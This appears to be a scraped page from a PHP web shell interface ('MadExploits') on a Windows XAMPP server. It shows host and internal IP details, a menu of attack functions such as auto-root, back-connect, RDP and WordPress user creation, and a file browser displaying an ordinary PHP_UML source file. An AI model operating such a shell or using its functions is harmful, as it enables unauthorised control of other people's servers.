Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
php /
pear /
PHP /
UML /
[ HOME SHELL ]
Name
Size
Permission
Action
Input
[ DIR ]
drwxrwxrwx
Metamodel
[ DIR ]
drwxrwxrwx
Output
[ DIR ]
drwxrwxrwx
Exception.php
906
B
-rw-rw-rw-
FilePatternFilterIterator.php
2.93
KB
-rw-rw-rw-
FileScanner.php
3.96
KB
-rw-rw-rw-
SimpleUID.php
2.11
KB
-rw-rw-rw-
Warning.php
1.4
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SimpleUID.php
<?php /** * PHP Parser and UML/XMI generator. Reverse-engineering tool. * * A package to scan PHP files and directories, and get an UML/XMI representation * of the parsed classes/packages. * * PHP version 5 * * @category PHP * @package PHP_UML * @author Baptiste Autin <ohlesbeauxjours@yahoo.fr> * @license http://www.gnu.org/licenses/lgpl.html LGPL License 3 * @version SVN: $Revision: 97 $ * @link http://pear.php.net/package/PHP_UML * @link http://www.baptisteautin.com/projects/PHP_UML/ * @since $Date: 2009-01-04 21:57:08 +0100 (dim., 04 janv. 2009) $ */ /** * A class for generating unique IDs, in two possible ways. * * Almost every XMI element contains a UID. This class can generate both globally * unique IDs, and deterministic unique IDs (ie. the IDs are the same every time the * parser is run again). We need such deterministic IDs because of the PHP_UML test * suite, which would report errors otherwise (because of different IDs !) * You select which one by setting the boolean property $determinisic to true/false * * @category PHP * @package PHP_UML * @author Baptiste Autin <ohlesbeauxjours@yahoo.fr> * @license http://www.gnu.org/licenses/lgpl.html LGPL License 3 * @link http://pear.php.net/package/PHP_UML */ class PHP_UML_SimpleUID { const PREFIX = 'PHP_UML_'; private static $counter = 0; /** * If true, the IDs contained in the XMI code will be very deterministic. * This is useful for running the PHP_UML test suite. Most of the time, you will * want to have more unique IDs, so leave that property to false (the generation * will then rely on uniqid()). * * @var boolean */ public static $deterministic = false; /** * Accessor for getting the UID * * @return string */ static function getUID() { if (self::$deterministic) return self::PREFIX.self::$counter++; else return uniqid(); } /** * Reset the deterministic generator * */ static function reset() { self::$counter = 0; } } ?>
Close